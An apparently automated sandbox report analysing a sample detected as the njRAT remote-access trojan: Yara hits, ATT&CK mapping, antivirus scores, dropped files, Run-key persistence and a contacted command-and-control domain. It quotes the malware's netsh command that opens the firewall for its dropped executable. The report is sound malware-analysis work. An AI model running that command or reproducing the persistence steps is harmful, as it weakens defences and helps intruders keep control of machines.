Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\System.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe

Code function: 0_2_10006B14 GetLocalTime,

0_2_10006B14

Source: C:\Users\user\Desktop\7FW4ce2RDy.exe

Code function: 0_2_10004B4D GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,

0_2_10004B4D

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings

Show sources

Source: C:\Users\user\AppData\Local\Temp\System.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\System.exe' 'System.exe' ENABLE

Modifies the windows firewall

Show sources

Source: C:\Users\user\AppData\Local\Temp\System.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\System.exe' 'System.exe' ENABLE

Stealing of Sensitive Information:

Yara detected Njrat

Show sources

Source: Yara match	File source: 8.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.System.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.7FW4ce2RDy.exe.7a1784.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.0.System.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.System.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.System.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.338283544.0000000000D52000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.299745785.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.557860043.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.295421440.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.295553833.00000000007A2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.343912996.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.326269986.0000000000D52000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.361347637.0000000000242000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.300093433.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.295774602.000000000079A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.355829815.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.559691939.00000000029E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7FW4ce2RDy.exe PID: 6908, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 562Server.exe PID: 4472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: System.exe PID: 5712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: System.exe PID: 6552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: System.exe PID: 3156, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: System.exe PID: 6872, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\SysWOW64\562Server.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\System.exe, type: DROPPED

Remote Access Functionality:

Detected njRat

Show sources

Source: 562Server.exe.0.dr, OK.cs	.Net Code: njRat config detected
Source: System.exe.4.dr, OK.cs	.Net Code: njRat config detected
Source: 4.2.562Server.exe.1d0000.0.unpack, OK.cs	.Net Code: njRat config detected
Source: 4.0.562Server.exe.1d0000.0.unpack, OK.cs	.Net Code: njRat config detected
Source: 301b5fcf8ce2fab8868e80b6c1f912fe.exe.8.dr, OK.cs	.Net Code: njRat config detected
Source: 8.0.System.exe.3e0000.0.unpack, OK.cs	.Net Code: njRat config detected
Source: 8.2.System.exe.3e0000.0.unpack, OK.cs	.Net Code: njRat config detected
Source: 16.0.System.exe.d50000.0.unpack, OK.cs	.Net Code: njRat config detected
Source: 16.2.System.exe.d50000.0.unpack, OK.cs	.Net Code: njRat config detected
Source: 19.0.System.exe.3e0000.0.unpack, OK.cs	.Net Code: njRat config detected
Source: 19.2.System.exe.3e0000.0.unpack, OK.cs	.Net Code: njRat config detected
Source: 20.2.System.exe.240000.0.unpack, OK.cs	.Net Code: njRat config detected
Source: 20.0.System.exe.240000.0.unpack, OK.cs	.Net Code: njRat config detected

Yara detected Njrat

Show sources

Source: Yara match	File source: 8.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.System.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.7FW4ce2RDy.exe.7a1784.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.System.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.0.System.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.System.exe.d50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.System.exe.240000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.562Server.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.System.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.373443216.0000000000242000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.338283544.0000000000D52000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.299745785.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.557860043.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.295421440.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.295553833.00000000007A2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.343912996.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.326269986.0000000000D52000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.361347637.0000000000242000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.300093433.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.295774602.000000000079A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.355829815.00000000003E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.559691939.00000000029E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7FW4ce2RDy.exe PID: 6908, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 562Server.exe PID: 4472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: System.exe PID: 5712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: System.exe PID: 6552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: System.exe PID: 3156, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: System.exe PID: 6872, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\SysWOW64\562Server.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\System.exe, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Native API1	Startup Items1	Startup Items1	Disable or Modify Tools21	Input Capture231	System Time Discovery1	Replication Through Removable Media1	Archive Collected Data1	Exfiltration Over Alternative Protocol1	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Registry Run Keys / Startup Folder221	Process Injection612	Deobfuscate/Decode Files or Information1	LSASS Memory	Peripheral Device Discovery1	Remote Desktop Protocol	Input Capture231	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Registry Run Keys / Startup Folder221	Obfuscated Files or Information21	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Clipboard Data2	Automated Exfiltration	Remote Access Software2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing111	NTDS	System Information Discovery24	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading121	LSA Secrets	Security Software Discovery111	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol211	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion31	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection612	DCSync	Virtualization/Sandbox Evasion31	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
7FW4ce2RDy.exe	84%	Virustotal		Browse
7FW4ce2RDy.exe	93%	ReversingLabs	Win32.Backdoor.XtremeRAT
7FW4ce2RDy.exe	100%	Avira	TR/Agent.ssnsz
7FW4ce2RDy.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\System.exe	100%	Avira	TR/ATRAPS.Gen
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe	100%	Avira	TR/ATRAPS.Gen
C:\Windows\SysWOW64\562Server.exe	100%	Avira	TR/ATRAPS.Gen
C:\Users\user\AppData\Local\Temp\System.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe	100%	Joe Sandbox ML
C:\Windows\SysWOW64\562Server.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\System.exe	95%	ReversingLabs	ByteCode-MSIL.Backdoor.Bladabhindi
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe	95%	ReversingLabs	ByteCode-MSIL.Backdoor.Bladabhindi
C:\Windows\SysWOW64\562Server.exe	95%	ReversingLabs	ByteCode-MSIL.Backdoor.Bladabhindi

Unpacked PE Files

Source	Detection	Scanner	Label	Download
4.2.562Server.exe.1d0000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
1.2.svchost.exe.10000000.0.unpack	100%	Avira	TR/Agent.ssnsz	Download File
16.0.System.exe.d50000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
0.0.7FW4ce2RDy.exe.10000000.0.unpack	100%	Avira	TR/Agent.ssnsz	Download File
20.2.System.exe.240000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
20.0.System.exe.240000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
8.0.System.exe.3e0000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
4.0.562Server.exe.1d0000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
16.2.System.exe.d50000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
8.2.System.exe.3e0000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
19.0.System.exe.3e0000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
0.2.7FW4ce2RDy.exe.10000000.0.unpack	100%	Avira	TR/Agent.ssnsz	Download File
19.2.System.exe.3e0000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
1.0.svchost.exe.10000000.0.unpack	100%	Avira	TR/Agent.ssnsz	Download File

Domains

Source	Detection	Scanner	Label	Link
windownssystem.ddns.net	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
windownssystem.ddns.net	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
windownssystem.ddns.net	unknown	unknown	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
windownssystem.ddns.net	true	Avira URL Cloud: safe	unknown

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	494416
Start date:	30.09.2021
Start time:	16:42:28
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	7FW4ce2RDy (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	37
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.adwa.spyw.evad.winEXE@17/7@34/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 15.8% (good quality ratio 13.8%) Quality average: 56.4% Quality standard deviation: 28.1%
HCA Information:	Successful, ratio: 79% Number of executed functions: 137 Number of non-executed functions: 157
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 2.22.152.11, 23.54.113.53, 20.199.120.85, 20.199.120.151, 20.82.210.154, 20.199.120.182, 23.0.174.200, 23.0.174.185, 20.54.110.249, 40.112.88.60, 23.10.249.43, 23.10.249.26, 20.50.102.62 Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, storeedgefd.dsx.mp.microsoft.com, client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, storeedgefd.dsx.mp.microsoft.com.edgekey.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, e16646.dscg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:43:33	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 301b5fcf8ce2fab8868e80b6c1f912fe "C:\Users\user\AppData\Local\Temp\System.exe" ..
16:43:41	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run 301b5fcf8ce2fab8868e80b6c1f912fe "C:\Users\user\AppData\Local\Temp\System.exe" ..
16:43:50	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 301b5fcf8ce2fab8868e80b6c1f912fe "C:\Users\user\AppData\Local\Temp\System.exe" ..
16:43:58	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\562Server.exe.log Download File
Process:	C:\Windows\SysWOW64\562Server.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	525
Entropy (8bit):	5.2874233355119316
Encrypted:	false
SSDEEP:	12:Q3LaJU20NaL10Ug+9Yz9t0U29hJ5g1B0U2ukyrFk7v:MLF20NaL3z2p29hJ5g522r0
MD5:	80EFBEC081D7836D240503C4C9465FEC
SHA1:	6AF398E08A359457083727BAF296445030A55AC3
SHA-256:	C73F730EB5E05D15FAD6BE10AB51FE4D8A80B5E88B89D8BC80CC1DF09ACE1523
SHA-512:	DEC3B1D9403894418AFD4433629CA6476C7BD359963328D17B93283B52EEC18B3725D2F02F0E9A142E705398DDDCE244D53829570E9DE1A87060A7DABFDCE5B3
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\System.exe.log Download File
Process:	C:\Users\user\AppData\Local\Temp\System.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	525
Entropy (8bit):	5.2874233355119316
Encrypted:	false
SSDEEP:	12:Q3LaJU20NaL10Ug+9Yz9t0U29hJ5g1B0U2ukyrFk7v:MLF20NaL3z2p29hJ5g522r0
MD5:	80EFBEC081D7836D240503C4C9465FEC
SHA1:	6AF398E08A359457083727BAF296445030A55AC3
SHA-256:	C73F730EB5E05D15FAD6BE10AB51FE4D8A80B5E88B89D8BC80CC1DF09ACE1523
SHA-512:	DEC3B1D9403894418AFD4433629CA6476C7BD359963328D17B93283B52EEC18B3725D2F02F0E9A142E705398DDDCE244D53829570E9DE1A87060A7DABFDCE5B3
Malicious:	false
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..

C:\Users\user\AppData\Local\Temp\System.exe Download File
Process:	C:\Windows\SysWOW64\562Server.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	29696
Entropy (8bit):	5.5773592840887005
Encrypted:	false
SSDEEP:	384:2JPqvANl7TxTD+VF2dbofPauxnaIuN15708COmqDk9jeHqGBsbh0w4wlAokw9Ohi:2eu75oa4fuTC8cqojeVBKh0p29SgRwW
MD5:	B207157C9F171556BF4D240C14AABA0E
SHA1:	958F8D31B526EE0DB15F40CEE2963A6E0F84D627
SHA-256:	0B642220D2D6A965C347C2DC4B5FDE794194C072A8621455EC3DCF68CBA7F610
SHA-512:	5FE7D96EF9D8619AD180E76DE3400D201614BF733F40095610BC0F24EA9C4747A4B05F398A046823A7E20A9410C11FF3CC177313999D53D236B98D5874805296
Malicious:	true
Yara Hits:	Rule: RAT_njRat, Description: Detects njRAT, Source: C:\Users\user\AppData\Local\Temp\System.exe, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Local\Temp\System.exe, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Local\Temp\System.exe, Author: Brian Wallace @botnet_hunter
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 95%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.V.................l............... ........@.. ....................................@.....................................S.......@............................................................................ ............... ..H............text....k... ...l.................. ..`.rsrc...@............n..............@..@.reloc...............r..............@..B........................H.......(Z...0......9....................................................0..........r...p.....r...p...........r...p.....r5..p.....r?..p.....r...p.....r...p.....r...p.....r...p(.........r...p(.........r...p(.........r...p(.........(....s.........s.........r...p.................r...p...........s......... ..............r=..p.........0..;.......~....o....o....r?..p~....(.....o.....o......%(.....(...............,,.......0..L.......~....o....o....r?..p~....(....o.....r=..po....(.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\System.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	29696
Entropy (8bit):	5.5773592840887005
Encrypted:	false
SSDEEP:	384:2JPqvANl7TxTD+VF2dbofPauxnaIuN15708COmqDk9jeHqGBsbh0w4wlAokw9Ohi:2eu75oa4fuTC8cqojeVBKh0p29SgRwW
MD5:	B207157C9F171556BF4D240C14AABA0E
SHA1:	958F8D31B526EE0DB15F40CEE2963A6E0F84D627
SHA-256:	0B642220D2D6A965C347C2DC4B5FDE794194C072A8621455EC3DCF68CBA7F610
SHA-512:	5FE7D96EF9D8619AD180E76DE3400D201614BF733F40095610BC0F24EA9C4747A4B05F398A046823A7E20A9410C11FF3CC177313999D53D236B98D5874805296
Malicious:	true
Yara Hits:	Rule: RAT_njRat, Description: Detects njRAT, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\301b5fcf8ce2fab8868e80b6c1f912fe.exe, Author: Brian Wallace @botnet_hunter
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 95%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.V.................l............... ........@.. ....................................@.....................................S.......@............................................................................ ............... ..H............text....k... ...l.................. ..`.rsrc...@............n..............@..@.reloc...............r..............@..B........................H.......(Z...0......9....................................................0..........r...p.....r...p...........r...p.....r5..p.....r?..p.....r...p.....r...p.....r...p.....r...p(.........r...p(.........r...p(.........r...p(.........(....s.........s.........r...p.................r...p...........s......... ..............r=..p.........0..;.......~....o....o....r?..p~....(.....o.....o......%(.....(...............,,.......0..L.......~....o....o....r?..p~....(....o.....r=..po....(.

C:\Windows\SysWOW64\562Server.exe Download File
Process:	C:\Users\user\Desktop\7FW4ce2RDy.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	29696
Entropy (8bit):	5.5773592840887005
Encrypted:	false
SSDEEP:	384:2JPqvANl7TxTD+VF2dbofPauxnaIuN15708COmqDk9jeHqGBsbh0w4wlAokw9Ohi:2eu75oa4fuTC8cqojeVBKh0p29SgRwW
MD5:	B207157C9F171556BF4D240C14AABA0E
SHA1:	958F8D31B526EE0DB15F40CEE2963A6E0F84D627
SHA-256:	0B642220D2D6A965C347C2DC4B5FDE794194C072A8621455EC3DCF68CBA7F610
SHA-512:	5FE7D96EF9D8619AD180E76DE3400D201614BF733F40095610BC0F24EA9C4747A4B05F398A046823A7E20A9410C11FF3CC177313999D53D236B98D5874805296
Malicious:	true
Yara Hits:	Rule: RAT_njRat, Description: Detects njRAT, Source: C:\Windows\SysWOW64\562Server.exe, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Windows\SysWOW64\562Server.exe, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: C:\Windows\SysWOW64\562Server.exe, Author: Brian Wallace @botnet_hunter
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 95%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....o.V.................l............... ........@.. ....................................@.....................................S.......@............................................................................ ............... ..H............text....k... ...l.................. ..`.rsrc...@............n..............@..@.reloc...............r..............@..B........................H.......(Z...0......9....................................................0..........r...p.....r...p...........r...p.....r5..p.....r?..p.....r...p.....r...p.....r...p.....r...p(.........r...p(.........r...p(.........r...p(.........(....s.........s.........r...p.................r...p...........s......... ..............r=..p.........0..;.......~....o....o....r?..p~....(.....o.....o......%(.....(...............,,.......0..L.......~....o....o....r?..p~....(....o.....r=..po....(.

C:\Windows\SysWOW64\562Server.exe.exe Download File
Process:	C:\Users\user\Desktop\7FW4ce2RDy.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:j:j
MD5:	A2CE4C7B743725199DA04033B5B57469
SHA1:	1AE348EAFA097AB898941EAFE912D711A407DA10
SHA-256:	0FFF86057DCFB3975C8BC44459740BA5FFB43551931163538DF3F39A6BB991BC
SHA-512:	23BD59F57B16CD496B550C1BBA09EB3F9A9DFE764EA03470E3CC43E4D0B4CA415D239772E4A9B930749E88CEAD9A7EC4B0A77D0DD310E61D8C6521AE6FF278B0
Malicious:	true
Preview:	O.K.

\Device\ConDrv Download File
Process:	C:\Windows\SysWOW64\netsh.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	313
Entropy (8bit):	4.971939296804078
Encrypted:	false
SSDEEP:	6:/ojfKsUTGN8Ypox42k9L+DbGMKeQE+vigqAZs2E+AYeDPO+Yswyha:wjPIGNrkHk9iaeIM6ADDPOHyha
